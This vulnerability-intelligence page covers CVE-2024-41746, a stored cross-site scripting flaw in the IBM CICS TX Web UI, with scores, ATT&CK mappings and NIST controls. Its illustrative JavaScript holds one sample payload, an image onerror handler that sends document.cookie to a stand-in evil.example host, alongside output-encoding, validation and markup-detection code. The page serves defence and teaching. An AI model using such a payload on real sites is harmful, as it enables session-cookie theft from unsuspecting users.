Cyber Resilience

CVE-2024-41746

Severity: High
Published: 16 January 2025
Modified: 14 August 2025
KEV Added: not listed
Patch: see the IBM advisory (https://www.ibm.com/support/pages/node/7171873)
CVSS v3.1 score: 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
EPSS score: 0.0029 (52.6th percentile)
Risk Priority: 15 (60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2024-41746 is a high-severity stored cross-site scripting (CWE-79) vulnerability in IBM CICS TX. Its CVSS v3.1 base score is 7.2 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). By EPSS the CVE ranks in the top 47.4% of CVEs by exploit likelihood (52.6th percentile), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2024-41746 is a stored cross-site scripting vulnerability (CWE-79) in IBM CICS TX Advanced versions 10.1 and 11.1, and in IBM CICS TX Standard 11.1. The issue is in the Web UI: users can embed arbitrary JavaScript code that alters the intended functionality of the UI and can lead to credential disclosure within a trusted session. Published on 2025-01-16, it carries a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).

Per the CVSS vector, the flaw is exploitable remotely over the network with low attack complexity and requires neither privileges nor user interaction. Successful exploitation lets an unauthenticated attacker persist malicious JavaScript in the Web UI; because the payload is stored, it runs in the browser, and therefore the trusted session, of every user for whom the affected content is later rendered, potentially enabling theft of credentials or other sensitive data.

IBM has issued a security advisory with details on the vulnerability and mitigation at https://www.ibm.com/support/pages/node/7171873.

Vulnerability details

IBM CICS TX Advanced 10.1, 11.1, and Standard 11.1 are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1185 Browser Session Hijacking (Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

T1539 Steal Web Session Cookie (Credential Access)
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Stored XSS in a public-facing Web UI is itself the exploitation of a public-facing application (T1190). Once injected script runs in a victim's browser, it can alter page content and intercept what the user does in that session (T1185) or read and exfiltrate the session cookie for use as the authenticated user (T1539), which is the credential-disclosure outcome the advisory describes.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-13214
CVE-2024-43178
CVE-2025-13723
CVE-2025-36253
CVE-2024-41742
CVE-2025-33088
CVE-2025-13718
CVE-2025-13219
CVE-2024-51476
CVE-2024-41743

Affected Assets

IBM CICS TX, versions 10.1 and 11.1.0.0

Mitigating Controls (NIST 800-53 r5)

SI-15 Information Output Filtering (prevent)
Directly prevents stored XSS exploitation by requiring filtering and encoding of Web UI outputs containing user-supplied data to block JavaScript execution.

SI-10 Information Input Validation (prevent)
Prevents injection of malicious JavaScript into the Web UI by validating and sanitizing all information inputs before storage.

SI-2 Flaw Remediation (prevent)
Mitigates the specific stored XSS flaw in IBM CICS TX by requiring timely flaw remediation through patching as per the IBM advisory.
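The stored-XSS mechanism described under Deeper analysis and the SI-15 / SI-10 controls listed above, shown together as an added example. This is illustrative code written for this page; it is not IBM CICS TX code and not taken from the IBM advisory. The "status message" store, the record fields, the page layout and the evil.example exfiltration host are assumptions made for the illustration, and the three stored records are constructed sample data.

```javascript
// Added example (not IBM CICS TX code, not from the IBM advisory): the stored
// XSS pattern described above, beside the SI-15 output-encoding and SI-10
// input-validation controls. The "status message" field, the record shape
// and the evil.example host are assumptions made for the illustration.

// Constructed sample store: two benign records and one payload an
// unauthenticated attacker has already persisted through the Web UI.
const STORED_MESSAGES = [
  { id: 1, author: "ops", text: "Region CICSTX01 restarted at 02:00" },
  { id: 2, author: "dba", text: "Log archive: 5 < 10 files rotated" },
  {
    id: 3,
    author: "attacker",
    // Fires without any click: onerror runs as soon as the broken image loads.
    text: '<img src=x onerror="fetch(\'//evil.example/c?\'+document.cookie)">',
  },
];

// Vulnerable renderer: stored text is concatenated into the HTML response
// unchanged, so record 3 becomes live markup in every viewer's session.
function renderUnsafe(records) {
  return "<ul>" + records.map((r) => `<li>${r.author}: ${r.text}</li>`).join("") + "</ul>";
}

// SI-15 Information Output Filtering: entity-encode the five characters that
// can switch HTML context. Applied at render time, so it neutralises payloads
// that were stored before the fix as well as new ones.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened renderer: every user-controlled field passes through escapeHtml.
function renderSafe(records) {
  return (
    "<ul>" +
    records.map((r) => `<li>${escapeHtml(r.author)}: ${escapeHtml(r.text)}</li>`).join("") +
    "</ul>"
  );
}

// SI-10 Information Input Validation at store time: accept only what the field
// legitimately needs (printable ASCII, bounded length). For a free-text field
// this cannot reject markup without also rejecting legitimate "5 < 10", which
// is why it is defence in depth and output encoding remains the primary fix.
const MAX_MESSAGE_LEN = 200;
function validateMessage(text) {
  if (typeof text !== "string") return false;
  if (text.length === 0 || text.length > MAX_MESSAGE_LEN) return false;
  return /^[\x20-\x7e]*$/.test(text); // no control characters, no non-ASCII
}

// Post-patch triage: which stored records would have rendered as markup under
// the vulnerable renderer? Heuristic (tag-like token or event-handler
// attribute), meant to find already-stored payloads, not to sanitise input.
function looksLikeMarkup(text) {
  return /<\s*\/?\s*[a-z]/i.test(text) || /\bon[a-z]+\s*=/i.test(text);
}
function auditStoredRecords(records) {
  return records.filter((r) => looksLikeMarkup(r.text)).map((r) => r.id);
}

// Run stand-alone: node stored_xss_example.js
console.log("unsafe :", renderUnsafe(STORED_MESSAGES));
console.log("safe   :", renderSafe(STORED_MESSAGES));
console.log("suspect record ids:", auditStoredRecords(STORED_MESSAGES));
```

Two points worth noticing when running it. First, `validateMessage` accepts the attacker's record because the payload is ordinary printable ASCII; character-class validation on a free-text field does not stop this class of bug, which is why the output-encoding control is the one that actually neutralises it. Second, the `onerror` handler in the sample payload needs no click, which matches the UI:N in the vector. Independently of both controls, marking the session cookie `HttpOnly` takes `document.cookie`, the exfiltration path used in record 3, out of reach of injected script; it does not stop actions the script can perform directly with the victim's session.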

References

IBM Security Bulletin for CVE-2024-41746 (IBM CICS TX): https://www.ibm.com/support/pages/node/7171873